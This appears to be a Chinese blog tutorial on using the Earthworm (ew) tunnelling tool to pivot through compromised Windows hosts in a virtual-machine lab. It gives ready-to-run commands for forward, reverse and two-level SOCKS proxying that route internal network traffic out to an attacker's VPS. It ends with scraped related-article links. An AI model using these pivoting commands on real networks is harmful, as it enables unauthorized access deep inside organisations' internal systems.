文章目录

  • 一、环境准备:
  • 二、工具:
  • 三、概念:
  • 四、学习目的:
  • 五、ew(Earthworm)介绍:
  • 六、ew(Earthworm)使用说明:
  • 七、ew(Earthworm)正向代理(适用于被控服务器拥有一个公网IP):
    • 1. 场景:
    • 2. 网络拓扑图:
    • 3. 说明:
    • 4. 实验过程:
  • 八、ew(Earthworm)反向代理:
    • 1. 一级代理:
      • 1.1 场景:
      • 1.2 网络拓扑图:
      • 1.3 说明:
      • 1.4 实验过程:
    • 2. 二级代理(一):
      • 2.1 场景:
      • 2.2 网络拓扑图:
      • 2.3 说明:
      • 2.4 实验过程:
    • 3. 二级代理(二):
      • 3.1 场景:
      • 3.2 网络拓扑图:
      • 3.3 说明:
      • 3.4 实验过程:

一、环境准备:

  关闭靶机电脑的防火墙及病毒和威胁防护的实时防护。
  开启内网主机的远程桌面。

二、工具:

ew(Earthworm)内网穿透工具
proxifier代理工具客户端

三、概念:

  内网渗透不光只是反弹一个shell,反弹一个端口,我们更需要对内网进行更深一步的扫描和渗透,这时候就需要找到一个代理服务器,充当外网和内网数据转发的节点,通过这个被我们控制的服务器,把所在网段的流量转发到公网(互联网)。
  所以出现了反弹代理,也叫反弹socket。

四、学习目的:

  在我们进行渗透测试过程中,获得了目标服务器的getshell权限后,要对内网其它服务器或者主机进一步渗透;这样的话,需要对其他主机进行信息收集,端口、服务探测及漏洞扫描等操作。
  进行这样操作,只进行反弹shell和端口转发已经不能满足需求,需要进一步进行反弹代理,通过我们控制的目标服务器,把目标服务器作为代理服务器,充当外网和内网数据转发的节点,把所在内网网段的流量引出到公网,这样的话,就方便我们对目标服务器所在内网网段的其他主机进行探测及漏洞利用了。

五、ew(Earthworm)介绍:

  EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。
  该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。
  工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内。

六、ew(Earthworm)使用说明:

  该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。

D:\ew>ew_for_Win.exe -h
版本:free1.2
./xxx ([-options] [values])*
选项 :
例如:./xxx -s ssocksd -h
-s   指定工作模式。工作模式支持如下:ssocksd , rcsocks , rssocks ,lcx_listen , lcx_tran , lcx_slavessocksd     创建正向socks代理服务端,监听在本地,直接把当前环境socks代理出去。rssocks     创建反向socks代理服务端rcsocks     反向socks代理客户端lcx_tran    正向tcp端口转发,监听在本地lcx_slave   反向tcp转发客户端lcx_listen  反向tcp服务端-l   listenport为服务器打开一个监听端口。
-d   refhost 设置反射主机地址。
-e   refport 设置反射端口。
-f   connhost 设置连接主机地址。
-g   connport 设置连接端口。
-h   help 显示帮助文本,通过添加 -s 参数,您还可以查看更详细的帮助。
-a   about 显示关于页面
-v   version 显示版本。
-t   usectime 设置超时的毫秒数。 默认的值为 1000

可以参考:http://rootkiter.com/EarthWorm/

七、ew(Earthworm)正向代理(适用于被控服务器拥有一个公网IP):

1. 场景:

  目标网络边界服务器存在公网IP且可任意开监听端口。

角色 系统 网卡 IP(网段)
攻击机 windows10虚拟机 NAT 192.168.100.151
被控主机1 windows08虚拟机 NAT
VMnet1
192.168.100.158(公网IP)
172.16.10.10
内网主机 windows03虚拟机 VMnet1 172.16.10.11

2. 网络拓扑图:

3. 说明:

  正向代理是服务器开放监听端口,客户端(攻击者)主动连接服务器的端口。
  适用于被控服务器拥有一个公网IP。

4. 实验过程:

1、在被控主机使用ew打开一个监听端口:
命令:

ew_for_Win.exe -s ssocksd -l 6666
-s          指定工作模式
ssocksd     创建正向socks代理服务端,监听在本地,直接把当前环境socks代理出去
-l          listenport为服务器打开一个监听端口


2、查看监听端口是否打开,可以看出监听端口已经打开:


3、使用proxifier代理工具客户端连接ew(Earthworm)的正向连接服务端:

在进行测试时可以出现无法连通的现象,这时需要在【被控主机1】的ew命令行里面敲一下回车键:

4、在攻击机上面连接被控服务器所在内网段的内网主机172.16.10.11:

八、ew(Earthworm)反向代理:

1. 一级代理:

1.1 场景:

  目标网络边界不存在公网IP,能够访问内网资源,可以访问公网,需要通过反弹方式创建 socks 代理。

角色 系统 网卡 IP(网段)
攻击机 windows10虚拟机 NAT 192.168.100.151
攻击者的公网vps windows10虚拟机 NAT 192.168.100.152
被控主机1 windows08虚拟机 NAT
VMnet1
192.168.100.158
172.16.10.10
内网主机 windows03虚拟机 VMnet1 172.16.10.11

1.2 网络拓扑图:

1.3 说明:

  反向代理是客户端开发端口,服务器连接客户端。
   适用于目标机器没有公网IP,但可访问内网资源。

1.4 实验过程:

1、在攻击者的公网vps上添加转接隧道,将6666收到的代理请求转交给反连8888端口的被控服务器:
命令:

ew_for_Win.exe -s rcsocks -l 6666 -e 8888
-s          指定工作模式
rcsocks     反向socks代理客户端
-l          listenport在代理客户端设置监听端口,将6666收到的 代理请求 转交给反连8888端口的被控服务器。
-e          refport设置反弹端口,用于接收被控服务器反弹过来的代理流量。

2、在被控服务器上启动SOCKS v5服务并反弹到公网vps主机的8888端口

命令:

ew_for_Win.exe -s rssocks -d 192.168.100.152 -e 8888
-s          指定工作模式
rssocks     创建反向socks代理服务端
-d          refhost设置反弹主机地址(IP)。
-e          refport设置反弹端口,反弹给公网vps开启的8888端口。

3、在公网vps出现以下界面,说明连接成功:

4、使用proxifier代理工具客户端连接公网vps上ew(Earthworm)的监听的端口:


在进行测试时可以出现无法连通的现象,这时需要在【攻击者的公网vps】的ew命令行里面敲一下回车键:

5、在攻击机上面连接被控服务器所在内网段的内网主机172.16.10.11:

2. 二级代理(一):

2.1 场景:

  在获得边界服务器【被控主机1】的webshell后,通过横向移动到内网环境1中的【被控主机2】,发现【被控主机2】同时处于另一个内网环境2中,但【被控主机2】所处的内网环境2无法访问公网,公网也无法访问【被控主机2】所在内网环境2 ,【被控主机2】却可以单向访问【被控主机1】,这时需要把【被控主机2】所在的内网环境2的流量代理出来。

角色 系统 网卡 IP(网段)
攻击机 windows10虚拟机 NAT 192.168.100.151
攻击者的公网vps windows10虚拟机 NAT 192.168.100.152
被控主机1 windows08虚拟机 NAT
VMnet1
192.168.100.158
172.16.10.10
被控主机2 windows08虚拟机 VMnet1
VMnet2
172.16.10.11
10.1.1.1
内网主机 windows03虚拟机 VMnet1 172.16.10.11

2.2 网络拓扑图:

2.3 说明:

  反向代理是客户端开发端口,服务器连接客户端。
   适用于目标机器没有公网IP,但可访问内网资源。

2.4 实验过程:

1、在公网vps添加转接隧道,将6666端口收到的代理请求流量转交给反连8888端口的被控主机:
命令:

ew_for_Win.exe -s rcsocks -l 6666 -e 8888
-s          指定工作模式
rcsocks     反向socks代理客户端
-l          listenport在代理客户端设置监听端口,将6666收到的 代理请求 转交给反连8888端口的被控服务器。
-e          refport设置反弹端口,用于接收被控服务器反弹过来的代理流量。

2、在被控服主机1上启动监听本机端口9999,并将9999端口接收到的代理流量,转发给攻击者的公网vps的8888端口:
命令:

ew_for_Win.exe -s lcx_tran -l 被控主机1本机端口 -f 攻击者的公网vps_IP -g 8888
ew_for_Win.exe -s lcx_tran -l 9999 -f 192.168.100.152 -g 8888
-s          指定工作模式
rssocks     创建反向socks代理服务端
-l          listenport在被控主机1上设置监听端口9999,将9999收到的 代理请求 转交给攻击者的公网vps的8888端口。
-f          connhost 设置连接主机地址(IP)。
-g          connport 设置连接端口。
这个命令的意思就是,把本机9999接收到的代理流量,转发到攻击者公网vps的192.168.100.152的8888端口上。

3、在被控主机2启动SOCKS v5代理服务端,并反弹到被控主机1的8888端口 :

ew_for_Win.exe -s rssocks -d 172.16.10.10 -e 9999
-s          指定工作模式
rssocks     创建反向socks代理服务端
-d          refhost设置反弹主机地址(IP)。
-e          refport设置反弹端口,反弹给公网vps开启的8888端口。
这个命令的意思就是在被控主机2启动SOCKS v5代理服务端,把本机的代理流量反向代理到被控服务器1的9999端口。

4、使用proxifier代理工具客户端连接公网vps上ew(Earthworm)的监听的端口:

5、在攻击机上面连接第二级内网被控主机所在内网段的内网主机10.1.1.2:


3. 二级代理(二):

3.1 场景:

  在获得边界服务器【被控主机1】的webshell后,发现被控主机1没有公网IP,但处于边界的【被控主机1】可访问公网;攻击者通过横向移动到内网环境1中的【被控主机2】,发现【被控主机2】同时处于另一个内网环境2中,但【被控主机2】所处的内网环境2无法访问公网,公网也无法访问【被控主机2】所在内网环境2 ,但处于边界的【被控主机1】却可以单向访问【被控主机2】所处的内网环境2,这时需要把【被控主机2】所在的内网环境2的流量代理出来。

角色 系统 网卡 IP(网段)
攻击机 windows10虚拟机 NAT 192.168.100.151
攻击者的公网vps windows10虚拟机 NAT 192.168.100.152
被控主机1 windows08虚拟机 NAT
VMnet1
192.168.100.158
172.16.10.10
被控主机2 windows08虚拟机 VMnet1
VMnet2
172.16.10.11
10.1.1.1
内网主机 windows03虚拟机 VMnet1 10.1.1.2

3.2 网络拓扑图:

3.3 说明:

  反向代理是客户端开发端口,服务器连接客户端。
   适用于目标机器没有公网IP,但可访问内网资源。

3.4 实验过程:

1、在攻击者的公网vps添加转接隧道,通过ew的lcx_listen模块监听本机的6666端口,把6666端口接受到的代理请求,转发到反连8888端口的主机:
命令:

ew_for_Win.exe -s lcx_listen -l 6666 -e 8888
-s          指定工作模式
lcx_listen  反向tcp服务端
-l          listenport在代理客户端设置监听端口,将6666收到的 代理请求 转交给反连8888端口的被控服务器。
-e          refport设置反弹端口,用于接收被控服务器反弹过来的代理流量。

2、在内网环境2中的【被控主机2】上通过ssocksd模块,开启正向代理服务,通过ssocksd模块监听【被控主机2】本机的9999端口,通过正向代理,把外流量引向内网:
命令:

ew_for_Win.exe -s ssocksd -l 9999
-s          指定工作模式
ssocksd     创建正向socks代理服务端,监听在本地,直接把当前环境socks代理出去
-l          listenport为服务器打开一个监听端口

3、在内网环境1中的被控主机1运行以下命令,通过ew的lcx_slave流量转发模块,将正向连接到攻击者的公网vps的8888端口,而获得的代理请求流量,转发给内网环境2的【被控主机2】,从而获得内网环境2的内网流量:

ew_for_Win.exe -s lcx_slave -d 攻击者的公网vps_IP -e 8888 -f 处于2级内网的被控主机 -g 9999
ew_for_Win.exe -s lcx_slave -d 192.168.100.152 -e 8888 -f 172.16.10.11 -g 9999
-s          指定工作模式
lcx_slave   反向tcp转发客户端
-d          refhost设置反弹主机地址(IP)。
-e          refport设置反弹端口,反弹给公网vps开启的8888端口
-f          connhost 设置连接主机地址
-g          connport 设置连接端口

4、使用proxifier代理工具客户端连接公网vps上ew(Earthworm)的监听的端口:

5、在攻击机上面连接第二级内网被控主机所在内网段的内网主机10.1.1.2:

【内网—内网转发】——代理转发_ew(Earthworm)代理转发相关推荐

  1. 红蓝对抗之隧道技术第二篇(reGeorg内网穿透、SSH隧道本地Socks代理、SSH远程转发、Earthworm Socks5代理、Tunna正向代理、ICMP隧道、DNS隧道、Frp穿透)

    文章目录 隧道应用 reGeorg内网穿透 SSH本地转发(正向) 场景一 场景二 SSH远程转发(反向) Earthworm Socks5代理 正向代理 反向代理 Tunna正向代理 ICMP隧道 ...

  2. 内网渗透--frp代理设置与proxychains代理设置

    标题内网渗透–frp代理设置与proxychains代理设置 内网服务器 内网IP地址 外网IP地址 内网web服务器(windows 7) 192.168.52.143 192.168.213.13 ...

  3. 网内计算:可编程数据平面和技术特定应用综述

    网内计算:可编程数据平面和技术特定应用综述 摘要--与云计算相比,边缘计算提供了更靠近终端设备的处理,降低了用户体验的延迟.最新的In-Network Computing范例采用可编程网络元素在数据达 ...

  4. 内网穿透基础概念---内网外网

    广域网和局域网 先上概念 广域网 广域网(英语:Wide Area Network,缩写为 WAN),又称外网.公网.是连接不同地区局域网或城域网计算机通信的远程网.通常跨接很大的物理范围,所覆盖的范 ...

  5. 微信转发的文件服务器留存吗,微信转发这种视频会感染病毒泄露隐私?网警的查证结果来了...

    原标题:微信转发这种视频会感染病毒泄露隐私?网警的查证结果来了 最近网上流传一条"紧急通知",称微信上流传着一些必须转发后才能继续观看的视频,这些视频其实被内植病毒,一旦转发,机主 ...

  6. 内网/外网以-本机IP/localhost等基础知识

    一.什么是内网 ​ 即所说的局域网,比如学校的局域网,局域网内每台计算机的IP地址在本局域网内具有互异性,是不可重复的.但两个局域网内的内网IP可以有相同的. 1.1 内外网IP定义 ​ 内网IP地址 ...

  7. 三层内网 外网打点到内网域 sec123 复现

    文章目录 三层内网 外网打点到内网域 sec123 复现 项目介绍 网络配置图 环境搭建 账号和密码 外网打点 端口扫描 网上银行系统漏洞 网上银行系统Hsql注入漏洞 tomexam SQL注入漏洞 ...

  8. 局域网内大幅提高网速

    局域网内大幅提高网速 这是一款用go语言写的局域网提速软件,能够几倍几十倍的提升本机网速. 使用限制: 1 局域网内(校园网或者公司内网) 2 局域网内使用DHCP上网 3 win10电脑,而且使用的 ...

  9. BT下载教程之UPnP功能使用、BT端口映射、内网外网之完全解析

    以下是微软官方网站对UPnP的解释: 问:什么是 UpnP? 答:通用即插即用 (UPnP) 是一种用于 PC 机和智能设备(或仪器)的常见对等网络连接的体系结构,尤其是在家庭中.UPnP 以 Int ...

最新文章

  1. 常用的高性能 KV 存储 Redis、Memcached、etcd、Zookeeper 区别
  2. 日志切割清理工具 Log-Cutter
  3. Centos目录及其常用处理命令
  4. Linux上iptables防火墙的基本应用教程
  5. 【生活】SSD 接口的分类
  6. unity3d 剧情制作_游戏设计作品集干货:跨专业如何入门 Unity3D 游戏引擎?
  7. java只允许一个用户登陆_spring boot security只允许一个用户(test1)登录
  8. Activity的Launch mode详解,A B C D的singleTask模式
  9. 17.凤凰架构:构建可靠的大型分布式系统 --- 技术演示工程实践
  10. paip.日期时间操作以及时间戳uapi php java python 总结
  11. php分配变量,php之smarty分配变量
  12. WdatePicker开始时间与结束时间
  13. 齐鲁工业大学计算机学院复试名单,齐鲁工业大学2019年硕士研究生拟录取名单公示...
  14. JavaScript数组map方法
  15. unity 中是如何实现游戏人物换装的
  16. 京东面试题咖啡杯问题(贪心算法、递归综合运用)
  17. Kafka集群搭建过程(kafka2.5+eagle)
  18. HDU 4489 (DP递推计数)
  19. 精确控制Origin to Word图片格式、大小及主题使用技巧
  20. 快学scala第二版笔记

热门文章

  1. html文本需要在区块里面向上移动,HTML 区块
  2. Decimal是什么类型
  3. 5610连接MMMB并显示隐藏文件夹的方法
  4. jQuery实现简单日历
  5. 函授计算机基础知识考试试题,2020年函授本科计算机应用基础课后作业、模拟题及答案.doc...
  6. jQuery ajax bootstrap layui
  7. nyoj995硬币找零完全背包
  8. 计算机网络ppt课件教学视频教程,计算机网络高级教程ppt课件
  9. win10+Ubantu双系统
  10. 搜索功能java代码_简单的搜索框代码实现